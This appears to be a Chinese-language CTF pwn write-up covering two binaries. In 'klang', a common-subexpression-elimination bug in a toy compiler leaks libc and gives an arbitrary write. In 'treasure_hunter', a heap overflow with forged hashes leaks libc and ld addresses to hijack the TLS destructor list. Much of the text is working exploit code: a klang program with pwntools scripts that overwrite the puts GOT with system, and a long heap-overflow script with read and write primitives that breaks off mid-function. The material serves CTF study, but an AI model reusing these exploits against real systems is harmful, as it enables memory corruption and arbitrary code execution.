0%

klang

1
2
3
4
5
6
klang: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=e64881fc54f3e0dfbb35631a6411af676c0f2d93, for GNU/Linux 3.2.0, with debug_info, not stripped
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,Partial RELRO,NX,PIE

题目的启动脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
def main():
    """Service entry point: authenticate, read a code snippet, compile it and run it.

    Returns 1 as soon as any step is rejected (token, proof of work, snippet
    length, compilation). Returns 0 after ``run_binary`` has been called.
    """
    if not check_token():
        print("Invalid token.")
        return 1

    # The proof of work runs under a 600-second alarm, which is cleared
    # again once the proof has been accepted.
    signal.alarm(600)
    if not proof_of_work():
        print("Invalid proof of work.")
        return 1
    signal.alarm(0)

    writeline("Give me your code, ended by a line with 'END_OF_SNIPPET' (excluding quote).")
    code = []
    while True:
        line = input()
        if line == 'END_OF_SNIPPET':
            break
        code.append(line)

    # The length limit applies to the joined snippet, newlines included.
    code = '\n'.join(code)
    if len(code) > 1024:
        print("Code too long.")
        return 1

    # compile() here is the service's own helper; a falsy result means failure.
    exe_path = compile(code)
    if not exe_path:
        print("Compilation failed.")
        return 1

    run_binary(exe_path)
    return 0
  • 在编译完成以后还会执行该程序
1
2
3
4
5
6
7
8
9
10
def run_binary(exe_path):
    """Replace the current process with the compiled binary, run under ``prlimit``.

    ``exe_path`` is the path of the freshly compiled executable. The function
    does not return when ``os.execvp`` succeeds.
    """
    os.chdir(WORKDIR)
    os.chmod(exe_path, 0o755)

    # Drop privileges before exec: supplementary groups, then gid, then uid.
    os.setgroups([])
    os.setgid(GID)
    os.setuid(UID)

    # Resource limits passed to prlimit: address space 67108864 bytes,
    # CPU time 30, at most 5 processes.
    commands = ["prlimit", "--as=67108864", "--cpu=30", "--nproc=5", "--", exe_path]
    os.execvp("prlimit", commands)

漏洞分析

这是一个编译器,通过 klang/src/compiler/Semantic 和 klang/src/compiler/SemanticParser 可以分析出该编译器的语法规则

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
// Parses the source file `FileName` and returns the module obtained from
// GetModule(), or nullptr when the file cannot be opened or parsing fails.
// Both failure paths print an error message to std::cerr.
ASTModule* ParseSource(const char* FileName) {
std::ifstream Input(FileName, std::ifstream::in);
if(!Input.is_open()) {
std::cerr << "Error: cannot open file " << FileName << std::endl;
return nullptr;
}

Scanner S(&Input); // lexical analysis
Parser P(S); // syntax analysis
// A non-zero result from parse() is treated as failure.
if(P.parse() != 0) {
std::cerr << "Error: parsing failed" << std::endl;
return nullptr;
}
return GetModule();
}

cpp 的 flex 和 bison 要高级一些,其中完成了大多数的工作:

1
2
3
4
"int"       { return Parser::make_INT(location()); }
"array" { return Parser::make_ARRAY(location()); }
"string" { return Parser::make_STRINGK(location()); }
"void" { return Parser::make_VOID(location()); }
  • Parser::xx 是由 bison 自动生成,token 流的结构信息也由 bison 生成并管理
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
single_statement
: ID ASSIGN expression {
$$ = new ASTStatementAssign(new ASTExpressionVariable($1), $3, yylineno);
}
| ID LIDX expression RIDX ASSIGN expression {
$$ = new ASTStatementAssign(new ASTExpressionArrayAccess($1, $3), $6, yylineno);
}
| ID LBRAC expression_list RBRAC {
$$ = new ASTStatementFunctionCall(new ASTExpressionFunctionCall($1, $3), yylineno);
}
| IF LBRAC expression RBRAC block ELSE block {
$$ = new ASTStatementIfElse($3, $5, $7, yylineno);
}
| IF LBRAC expression RBRAC block {
$$ = new ASTStatementIf($3, $5, yylineno);
}
| DO block WHILE LBRAC expression RBRAC {
$$ = new ASTStatementWhile($5, $2, yylineno);
}
| RETURN expression {
$$ = new ASTStatementReturn($2, yylineno);
}
| RETURN {
$$ = new ASTStatementReturn(nullptr, yylineno);
}
;
  • 每个不同的 AST 节点其实对应了一个类(在 klang/src/compiler/Semantic/AST.h 中实现)

AST 的层次结构如下:

1
2
3
4
5
6
7
8
class ASTModule {
public:
......

private:
std::vector<ASTFunction*> Functions_;
std::map<ASTName, ASTFuncPrototype> ExternalFunctions_;
};
  • ASTModule:由函数和内置函数组成
1
2
3
4
5
6
7
8
9
10
11
12
class ASTFunction {
public:
......

private:
ASTName Name_;
ASTModule* Parent_;
ASTType ReturnType_;
std::vector<ASTParameter> Parameters_;
std::vector<ASTVarDef> Variables_;
std::vector<ASTStatement*> Statements_;
};
  • ASTFunction:包含参数,局部变量和若干语句
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
class ASTStatement {
public:
enum ASTStatementType : int {
ST_ASSIGN,
ST_IF,
ST_IFELSE,
ST_WHILE,
ST_RETURN,
ST_CALL,
};

......

private:
ASTFunction* Parent_;
ASTStatementType Type_;
int LineNo_;
};
  • ASTStatement:不同的语句都会继承 ASTStatement
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
class ASTExpression {
public:
enum ASTExpressionType : int {
EX_INTEGER,
EX_STRING,

EX_BINARY,

EX_FUNCTION_CALL,

EX_VARIABLE,
EX_ARRAY_ACCESS,
};

......

private:
ASTExpressionType Type_;
ASTStatement* Parent_;
};
  • ASTExpression:不同的表达式都会继承 ASTExpression

语法分析最终会形成一个 AST,各个 AST 节点之间的层次关系支撑起了 AST 的结构,语义分析需要的数据信息也包含在各个 AST 节点中

该编译器提供了一些内置函数:

1
2
3
4
5
6
7
8
9
10
11
12
auto *Module = ParseSource(FileName);
if(!Module) {
return 1;
}

// external function defs
Module->AddExternalFunction("printi", std::make_pair(TY_VOID, std::vector<ASTType>{TY_INTEGER}));
Module->AddExternalFunction("prints", std::make_pair(TY_VOID, std::vector<ASTType>{TY_STRING}));
Module->AddExternalFunction("inputi", std::make_pair(TY_INTEGER, std::vector<ASTType>{}));
Module->AddExternalFunction("inputs", std::make_pair(TY_STRING, std::vector<ASTType>{}));
Module->AddExternalFunction("random", std::make_pair(TY_INTEGER, std::vector<ASTType>{}));
Module->AddExternalFunction("array_new", std::make_pair(TY_ARRAY, std::vector<ASTType>{TY_INTEGER}));
  • 可以分析出函数名,返回值和传参
1
2
3
using ASTType = int;
using ASTName = std::string;
using ASTFuncPrototype = std::pair<ASTType, std::vector<ASTType>>;
1
2
std::vector<ASTFunction*> Functions_;
std::map<ASTName, ASTFuncPrototype> ExternalFunctions_;
1
2
3
void AddExternalFunction(const char* Name, ASTFuncPrototype Prototype) {
ExternalFunctions_[Name] = Prototype;
}
  • AddExternalFunction 传入两个参数:“函数名” 和一个 pair 类型(用于记录函数返回值和传参)

在语义分析的过程中,会以 ASTFunction 为单位将 AST 节点转化为 IR 节点(在 klang/src/include/IR/IR.h 中实现):

1
2
3
4
5
6
7
8
9
// Builds a new IR module named "<main>" from the AST module held in Module_.
// Every AST function is converted with GenerateFunction() and added to the
// new module. Returns the generation context together with the IR module.
std::pair<ModuleGenCtx, Module*> IRGen::Generate() {
Module* TheModule = new Module("<main>");
// A single module-level context is shared by all function conversions.
ModuleGenCtx Ctx(Module_);

for(auto *F : Module_->GetFunctions()) {
TheModule->AddFunction(GenerateFunction(Ctx, F));
}
return std::make_pair(Ctx, TheModule);
}
  • 先初始化根 IR 节点 TheModule,然后调用 GenerateFunction 将 AST 节点转化为 IR 节点
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
// Converts one AST function `F` into an IR function and returns it.
// `MCtx` is the module-level generation context, handed to the per-function
// context by pointer.
Function* IRGen::GenerateFunction(ModuleGenCtx& MCtx, ASTFunction* F) {
FuncBuilder* B = new FuncBuilder(F->GetName(), F->GetParameters().size());

FuncGenCtx Ctx(F, B, &MCtx);
Ctx.InitVariables();
GenerateBlock(Ctx, F->GetStatements());

// add initializers
// For each entry of F->GetVariables(), an assignment of immediate 0 is
// inserted before the instruction that was the entry block's head once the
// body had been generated.
auto *Entry = B->GetFunction()->Entry();
auto *Inst = Entry->Head();
for(auto &Var : F->GetVariables()) {
Entry->InsertBefore(new AssignInst(Ctx.GetVariable(Var.first), B->Imm(0)), Inst);
}
return B->GetFunction();
}

接着编译器会进行一些优化操作:

1
2
3
4
5
6
7
8
9
10
11
12
// Runs the optimization passes on `F` repeatedly until one full round
// reports no change.
void OptimizeIR(Function* F) {
bool Changed;
do {
Changed = false;
// `|=` does not short-circuit, so every pass runs in every round even
// when an earlier pass already reported a change.
Changed |= ConstantPropagate(F);
Changed |= CopyPropagate(F);
Changed |= LocalCSE(F);
Changed |= GlobalCSE(F);
Changed |= DeadCodeElimination(F);
} while(Changed);
return;
}

最后生成汇编代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
// Emits the assembly text for the whole module into ModuleSS_: an
// Intel-syntax directive, a .text section with one emitted function per IR
// function, then a .data section filled by GenerateStringLiterals().
// Always returns true.
bool ModuleCodegen::Generate() {
ModuleSS_ << ".intel_syntax noprefix\n";

ModuleSS_ << ".text\n";
for(auto *F : (*Module_)) {
// Each function gets its own builder; functions are separated by a newline.
MachineFuncBuilder Builder(F);
Builder.Generate();
Builder.GetFunction()->Emit(ModuleSS_);
ModuleSS_ << '\n';
}

ModuleSS_ << ".data\n";
GenerateStringLiterals();
return true;
}

程序的漏洞点就发生在优化这一步

公共子表达式消除 CSE:如果一个表达式 e 已经计算过了,并且从先前的计算到现在 e 中所有变量的值都没有发生变化,那么 e 就成为公共子表达式:

1
2
3
4
5
6
7
8
9
10
11
function main() : -> int {
printi(leak_libc(1));
return 0;
}

function leak_libc(int a) : int b-> int {
b := a + 1;
do{
}while( a + 1 < 10);
return b;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
.global K_leak_libc
K_leak_libc:
_leak_libc_bb1:
push rbp
mov rbp, rsp
mov rcx, qword ptr [rbp + 16]
add rcx, 0x1
mov r8, rcx
jmp _leak_libc_bb3
_leak_libc_bb2:
mov rax, r8
mov rsp, rbp
pop rbp
ret
_leak_libc_bb3:
xor r9, r9
cmp rcx, 0xa # 优化点
mov rax, 0x1
cmovl r9, rax
test r9, r9
jne _leak_libc_bb3
jmp _leak_libc_bb2
  • 这里的 a + 1 就是公共子表达式,已经被寄存器 RCX 代替

在正常情况下这种优化没有问题,但如果公共子表达式没有初始化,那么用于替代的寄存器就不会初始化:

1
2
3
4
5
6
7
8
9
10
11
function main() : -> int {
printi(leak_libc());
return 0;
}

function leak_libc() : int a,int b-> int {
b := a + 1;
do{
}while( a + 1 < 10);
return b;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
.global K_leak_libc
K_leak_libc:
_leak_libc_bb1:
push rbp
mov rbp, rsp
jmp _leak_libc_bb3
_leak_libc_bb2:
mov rax, 0x1
mov rsp, rbp
pop rbp
ret
_leak_libc_bb3:
test rcx, rcx # 优化点
jne _leak_libc_bb3
jmp _leak_libc_bb2
  • 显然这里的 RCX 寄存器并没有初始化,并且 do-while 语句的部分代码也被优化掉了

入侵思路

利用 “公共子表达式消除” 的漏洞可以泄露未初始化的 RCX 寄存器(泄露 libc 地址):

1
2
3
4
5
6
7
8
9
10
11
function main() : -> int {
printi(leak_libc());
return 0;
}

function leak_libc() : int a-> int {
do{
if(a==1){};
}while(0);
return a==1;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
.global K_leak_libc
K_leak_libc:
_leak_libc_bb1:
push rbp
mov rbp, rsp
jmp _leak_libc_bb3
_leak_libc_bb2:
mov rax, r8
mov rsp, rbp
pop rbp
ret
_leak_libc_bb3:
test rcx, rcx
mov r8, rcx
jne _leak_libc_bb5
jmp _leak_libc_bb4
_leak_libc_bb4:
jmp _leak_libc_bb2
_leak_libc_bb5:
jmp _leak_libc_bb4
  • 没有被初始化的 RCX 寄存器将会被函数返回

我们可以拷贝题目 docker 容器中,目录 /workdir 下的二进制文件,然后用 GDB 进行调试:

1
2
3
RAX  0x7ffff7e9bd9b (alarm+11) ◂— cmp    rax, -0xfff
RBX 0x4016b0 (__libc_csu_init) ◂— endbr64
RCX 0x7ffff7e9bd9b (alarm+11) ◂— cmp rax, -0xfff
1
2
3
4
  0x40121e <_leak_libc_bb2>      mov    rax, r8
0x401221 <_leak_libc_bb2+3> mov rsp, rbp
0x401224 <_leak_libc_bb2+6> pop rbp
0x401225 <_leak_libc_bb2+7> ret <0x4011ff; K_main+9>
  • 成功泄露出 libc 地址(alarm+11),减去固定偏移即可得到 libc 基地址

程序还有另一处漏洞:

1
2
3
4
5
6
7
8
9
10
11
12
function wr64() : int v,string s -> void {
v := inputi();
s := inputs();
_wr64(s,v);
return;
}

function _wr64(string x,int b) : array t -> void {
t[0] := b;
t := array_new(1);
return;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
.global K__wr64
K__wr64:
__wr64_bb1:
push rbp
mov rbp, rsp
sub rsp, 0x8
push qword ptr [rbp + 24] # 第3个参数
push 0x0 # 第2个参数
push rcx # 第1个参数
mov qword ptr [rbp - 8], rcx
call K_array_store
mov rcx, qword ptr [rbp - 8]
add rsp, 0x18
push 0x1
mov qword ptr [rbp - 8], rcx
call K_array_new
mov rcx, qword ptr [rbp - 8]
mov r8, rax
add rsp, 0x8
mov rcx, r8
mov rsp, rbp
pop rbp
ret
  • 按照正常的语法,对于 array 应该先调用 array_new 开辟内存空间,然后才能调用 array_store 存储数据
  • 但事实上 array_store 可以利用遗留在寄存器上的地址作为内存空间
  • 其第一个参数 RCX 没有初始化,可以是上一个函数遗留的值
1
2
3
4
5
6
7
8
9
/* Stores `value` at position `index` of the array `arr`.
 * Calls fatal() when `arr` is NULL or when `index` is outside [0, arr->size).
 * The only check made on `arr` itself is the NULL test; the size used for the
 * bounds check is read through the pointer as given. */
void do_array_store(struct array_t* arr, int64_t index, int64_t value) {
if(!arr) {
fatal("Array is null");
}
if(index < 0 || index >= arr->size) {
fatal("Array index out of bounds");
}
arr->data[index] = value;
}

接下来的入侵思路就比较清晰了:

  • 先往 inputi 中写入 system_addr
  • 再往 inputs 中写入 puts_got
  • 然后寄存器 RCX 会由于没有初始化而存储有 puts_got 的地址
  • 正常调用 do_array_store,就会往 puts_got 中写入 system_addr
1
2
p.sendline(str(system_addr))
p.sendline(p64(0x404018))

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
function main() : -> int {
printi(leak_libc());
wr64();
prints("cat /flag");
return 0;
}

function leak_libc() : int a-> int {
do{
if(a==1){};
}while(0);
return a==1;
}

function wr64() : int v,string s -> void {
v := inputi();
s := inputs();
_wr64(s,v);
return;
}

function _wr64(string x,int b) : array t -> void {
t[0] := b;
t := array_new(1);
return;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
from pwn import *
context.log_level='DEBUG'

libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

local = 0
if local:
p=process("./exp.exe")
else:
p=remote("127.0.0.1",9999)
p.sendlineafter(b'END_OF_SNIPPET',open("./exp.klang").read())
p.sendline("END_OF_SNIPPET")
p.recvuntil("(excluding quote).\n")

def debug():
gdb.attach(p,"b* 0x40127b\n")
#gdb.attach(p,"b *$rebase(0x1409)\nb *$rebase(0x137A)\n")
pause()

#debug()

# Parse the leaked value printed by the target. The bytes come from the remote
# process, so they are parsed as an integer literal instead of being passed to
# eval(). Base 0 accepts both decimal and 0x-prefixed output.
leak_addr = int(p.recvuntil(b"\n").decode(), 0)
# 0xe2d9b is the offset of the leaked address inside libc for this libc build.
libc_base = leak_addr - 0xe2d9b
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

system_addr = libc_base + libc.symbols['system']
success("system_addr >> "+hex(system_addr))

p.sendline(str(system_addr))
p.sendline(p64(0x404018))

p.interactive()

treasure_hunter

1
GNU C Library (Ubuntu GLIBC 2.35-0ubuntu3.6) stable release version 2.35.
1
2
3
4
5
6
treasure_hunter: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=31386191e745f7d03c572b792bd501c102ba33f3, for GNU/Linux 3.2.0, not stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开
1
2
3
4
5
6
7
8
You are a treasure hunter hoping to dig out as much gold as you can.
Today, you go to a desert, where as said buried many gold coins.
For more convenience, people divided this desert into pieces, each piece labelled with a number(0 to 0xFFF).
As there is limited water, you cannot dig for a long time.
Every day, you can only dig or detect one piece of this desert.
If you choose to dig, you can find all the coins in this piece (if there exists any), but in a risk of quicksand.
If you choose to detect, you can find out whether this piece is safe to dig, avoiding losing your life.
To start your exploration, I draw an incomplete map of this desert which contains danger info of some pieces.

漏洞分析

堆溢出漏洞:

1
2
3
page = malloc(size);
printf("Content: ");
len = read(0, page, size + 10);

入侵思路

题目有两处可能可以利用的打印:

1
2
if ( random_list[site] )
printf("Congratulations! we discovered %d gold coin(s)!\n", (unsigned __int8)random_list[site]);
  • 打印位于堆(mmap)上的随机数
1
2
3
4
printf(
"\x1B[1;31mHello, my boy! I'm your god. I'll give you a mysterious number, if you know how to use this number, Yo"
"u can then get a thing called flag: %p\x1B[0m",
hashmap);
  • 打印位于 BSS 的堆地址

通过伪造 hash 可以使 site 特别大,从而在 random_list 上造成溢出

下面是提取出的 hash 逻辑:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
#include <stdio.h>
#include <string.h>
#include <openssl/sha.h>

/* Reproduces the target's hash: SHA-256 over the 8 raw bytes of hash_buffer.
 * The first 8 digest bytes are read as a native size_t, and three views of
 * that value are printed. The process exit status is the top 7 bits.
 * Assumes a 64-bit size_t, as the shift by 57 requires. */
int main() {
    SHA256_CTX sha256;
    size_t hash_buffer;
    /* The digest buffer must be unsigned char to match the OpenSSL API. */
    unsigned char hash_str[SHA256_DIGEST_LENGTH];
    size_t hash_result;
    size_t hash_result1;
    size_t hash_result2;

    hash_buffer = 0x7ffff7419ce0;
    SHA256_Init(&sha256);
    SHA256_Update(&sha256, (void *) &hash_buffer, 8);
    /* Pass the array itself; &hash_str has type unsigned char (*)[32]. */
    SHA256_Final(hash_str, &sha256);

    /* memcpy avoids the aliasing and alignment problems of casting the
     * byte buffer to size_t*. */
    memcpy(&hash_result, hash_str, sizeof(hash_result));
    printf("%zx\n", hash_result);
    hash_result1 = (hash_result >> 4) % 0x100000000;
    printf("%zx\n", hash_result1);
    hash_result2 = hash_result >> 57;
    printf("%zx\n", hash_result2);

    return (int) hash_result2;
}

转化为 python 脚本:

1
2
3
4
5
6
7
8
9
10
def hash(input):
    """Return the top 7 bits (0..0x7f) of the first 8 bytes of SHA-256(input).

    ``input`` is packed as a signed 64-bit little-endian integer, so the raw
    binary value is hashed, not its decimal text. The first 8 digest bytes are
    read as an unsigned little-endian integer and shifted right by 0x39. This
    gives the same result as a signed read followed by adding 0x80 to
    negative values.
    """
    pack = struct.pack('<q', input)
    digest = hashlib.sha256(pack).digest()
    hash_int, = struct.unpack('<Q', digest[:8])
    return hash_int >> 0x39

泄露样例如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
site = [228,1368,3783,3182,3625,3347,349,1557,798,2864,1766,3149,2107,3684,601,1260,235]
one_gadget = [0x50a47,0xebc81,0xebc85,0xebc88,0xebce2,0xebd3f,0xebd43]

for i in range(len(site)):
sla("captain?",str(site[i]))
ru("discovered ")
gold = eval(ru(" "))
sla("some?","g")
sla("get?",str(gold))
sla("Content length:",str(0x8))
payload = b"a"
sa("Content:",payload)
sa("Buy?","n")
sa("captain?","n")

sla("captain?",str(site[0]))
sla("some?","g")
sla("Content length:",str(0x8))
payload = b"a"*0x8
sla("Content:",payload)

sa("Buy?","y")
ru("flag: ")
leak_addr = eval(ru("\x1B[1;31mI")[:-4])
heap_base = leak_addr - 0x122c0
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

sla("write:",str(0))
sa("Write:",str(0))
sa("captain?","n")

target = 0x3018+3
sla("captain?",str(site[0]))
sla("some?","g")
sla("Content length:",str(0x408))
payload = b""
payload += (p64(target) + p64(0x1))*0x3f
payload += p64(heap_base+0x11ec0)+p64(heap_base+0x11ec0+0x200)+p64(heap_base+0x11ec0+0x200)
payload += p64(0x21)+p16((heap_base+0x122a0)%0x10000)
sa("Content:",payload)
sa("Buy?","y")
sla("write:",str(0))
sa("Write:",p8(hash.hash(target)))
sa("captain?","n")
sla("captain?",str(target))
ru("discovered ")
part_3 = eval(ru(" "))
success("part_3 >> "+hex(part_3))
sla("some?","g")
sla("get?",str(0))

target = 0x3018+4
sla("Content length:",str(0x408))
payload = b""
payload += (p64(target) + p64(0x1))*0x3f
payload += p64(heap_base+0x11ec0)+p64(heap_base+0x11ec0+0x200)+p64(heap_base+0x11ec0+0x200)
payload += p64(0x21)+p16((heap_base+0x122a0)%0x10000)
sa("Content:",payload)
sa("Buy?","y")
sla("write:",str(0))
sa("Write:",p8(hash.hash(target)))
sa("captain?","n")
sla("captain?",str(target))
ru("discovered ")
part_4 = eval(ru(" "))
success("part_4 >> "+hex(part_4))
sla("some?","g")
sla("get?",str(0))

target = 0x3018+8+2
sla("Content length:",str(0x408))
payload = b""
payload += (p64(target) + p64(0x1))*0x3f
payload += p64(heap_base+0x11ec0)+p64(heap_base+0x11ec0+0x200)+p64(heap_base+0x11ec0+0x200)
payload += p64(0x21)+p16((heap_base+0x122a0)%0x10000)
sa("Content:",payload)
sa("Buy?","y")
sla("write:",str(0))
sa("Write:",p8(hash.hash(target)))
sa("captain?","n")
sla("captain?",str(target))
ru("discovered ")
part_2 = eval(ru(" "))
success("part_2 >> "+hex(part_2))
sla("some?","g")
sla("get?",str(0))

target = 0x3018+8+1
sla("Content length:",str(0x408))
payload = b""
payload += (p64(target) + p64(0x1))*0x3f
payload += p64(heap_base+0x11ec0)+p64(heap_base+0x11ec0+0x200)+p64(heap_base+0x11ec0+0x200)
payload += p64(0x21)+p16((heap_base+0x122a0)%0x10000)
sa("Content:",payload)
sa("Buy?","y")
sla("write:",str(0))
sa("Write:",p8(hash.hash(target)))
sa("captain?","n")
sla("captain?",str(target))
ru("discovered ")
part_1 = eval(ru(" "))
success("part_1 >> "+hex(part_1))
sla("some?","g")
sla("get?",str(0))

libc_addr = (part_1<<8)+(part_2<<16)+(part_3<<24)+(part_4<<32)+(0x7f<<40)
libc_base = libc_addr - 0x174900
success("libc_addr >> "+hex(libc_addr))
success("libc_base >> "+hex(libc_base))

接下来只能尝试劫持 tls_dtor_list_addr,但在此之前需要先泄露位于 tls 上的 key 值(全局变量名称为 __pointer_chk_guard_local)

由于题目本身的限制,不能直接泄露 tls 上的 key 值,只能从其他地方泄露 key 值,全局搜索 key 值可以找到如下的地址:

1
2
3
4
5
pwndbg> search -t qword 0xfcbb79539c458355
Searching for value: b'U\x83E\x9cSy\xbb\xfc'
[anon_7fb6bbc70] 0x7fb6bbc70770 0xfcbb79539c458355
ld-linux-x86-64.so.2 0x7fb6bbce2ab0 0xfcbb79539c458355
[stack] 0x7ffc0c96a481 0xfcbb79539c458355
  • PS:该地址位于 ld 上,需要先泄露 ld 的基地址(由于 cpp 的影响,偏移不唯一但命中概率挺高的)

泄露 key 值后,尝试劫持 tls_dtor_list_addr(fs_base-0x78) 即可

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
# -*- coding:utf-8 -*-
from pwn import *
import hashlib
import struct

arch = 64
challenge = './treasure_hunter'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc.so.6')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
# lg logs "<expr> --> 0x<value>" wrapped in ANSI colour codes. The expression
# string is evaluated locally, so only pass trusted, hard-coded names.
lg = lambda s : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# Pad a short leak with NUL bytes up to the word size before unpacking.
# The fill argument must be exactly one byte (b'\x00').
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))

b = "set debug-file-directory ./.debug/\n"
#b += "b *$rebase(0x2D3B)\n"

local = 1
if local:
p = process(challenge)
#p = gdb.debug(challenge, b)
else:
p = remote('1.95.4.251','31778')

def debug():
gdb.attach(p,"")
#gdb.attach(p,"b *$rebase()\n")
#pause()

def cmd(op):
sla(">",str(op))

#hash = cdll.LoadLibrary('./hash.so')

#debug()

site = [228,1368,3783,3182,3625,3347,349,1557,798,2864,1766,3149,2107,3684,601,1260,235]
one_gadget = [0x50a47,0xebc81,0xebc85,0xebc88,0xebce2,0xebd3f,0xebd43]

for i in range(len(site)):
sla("captain?",str(site[i]))
ru("discovered ")
gold = eval(ru(" "))
sla("some?","g")
sla("get?",str(gold))
sla("Content length:",str(0x8))
payload = b"a"
sa("Content:",payload)
sa("Buy?","n")
sa("captain?","n")

def hash(input):
    """Return the top 7 bits (0..0x7f) of the first 8 bytes of SHA-256(input).

    ``input`` is packed as a signed 64-bit little-endian integer, so negative
    offsets are accepted. The first 8 digest bytes are read as an unsigned
    little-endian integer and shifted right by 0x39. This gives the same
    result as a signed read followed by adding 0x80 to negative values.
    """
    pack = struct.pack('<q', input)
    digest = hashlib.sha256(pack).digest()
    hash_int, = struct.unpack('<Q', digest[:8])
    return hash_int >> 0x39

sla("captain?",str(site[0]))
sla("some?","g")
sla("Content length:",str(0x8))
payload = b"a"*0x8
sla("Content:",payload)

sa("Buy?","y")
ru("flag: ")
leak_addr = eval(ru("\x1B[1;31mI")[:-4])
heap_base = leak_addr - 0x122c0
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

sla("write:",str(0))
sa("Write:",str(0))
sa("captain?","n")
sla("captain?",str(site[0]))
sla("some?","g")

parts = [0,0,0,0,0,0,0,0]

def rotate_left(value,left):
    """Rotate the 64-bit unsigned integer ``value`` left by ``left`` bits.

    ``value`` is expected to fit in 64 bits and ``left`` to lie in 0..64.
    The result is masked back to 64 bits.
    """
    rotated = (value << left) | (value >> (8 * 8 - left))
    return rotated & 0xffffffffffffffff


def read(input,n):
    """Leak ``n`` consecutive bytes starting at site offset ``input`` into ``parts``.

    Each round sends one overflowing "Content" payload, answers the menu
    prompts, digs at ``input + i`` and stores the reported coin count in the
    global ``parts[i]``. The function must be entered while the target is
    waiting at the "Content length:" prompt.
    """
    global parts
    map_start = heap_base+0x11ec0
    map_end = map_start + 0x1000
    map_metadata = heap_base+0x122a0

    for i in range(n):
        target = input+i
        sla("Content length:",str(0x408))
        # 0x3f (key, value) pairs, three pointers, a 0x21 size field and a
        # 2-byte partial pointer: 0x412 bytes, i.e. the requested 0x408 plus
        # the 10 extra bytes the vulnerable read accepts.
        payload = b""
        payload += (p64(target,sign=True) + p64(0x1))*0x3f
        payload += p64(map_start) + p64(map_end) + p64(map_end)
        payload += p64(0x21) + p16((map_metadata)%0x10000)

        sa("Content:",payload)
        sa("Buy?","y")
        sla("write:",str(0))
        sa("Write:",p8(hash(target)))
        sa("captain?","n")
        sla("captain?",str(target))
        ru("discovered ")
        # The count is printed with %d; parse it as an integer rather than
        # eval()-ing bytes received from the target.
        parts[i] = int(ru(" "))
        success("input:%lx => parts[%d]=%lx",input,i,parts[i])
        sla("some?","n")

def write(input,addr,n):
    """Write the low ``n`` bytes of ``addr`` to site offsets ``input`` .. ``input + n - 1``.

    Each round sends the same overflowing "Content" payload shape as ``read``,
    selects site ``input + i`` and buries byte ``i`` of ``addr``, least
    significant byte first. The function must be entered while the target is
    waiting at the "Content length:" prompt.
    """
    map_start = heap_base+0x11ec0
    map_end = map_start + 0x1000
    map_metadata = heap_base+0x122a0

    for i in range(n):
        target = input+i
        sla("Content length:",str(0x408))
        payload = b""
        payload += (p64(target,sign=True) + p64(0x1))*0x3f
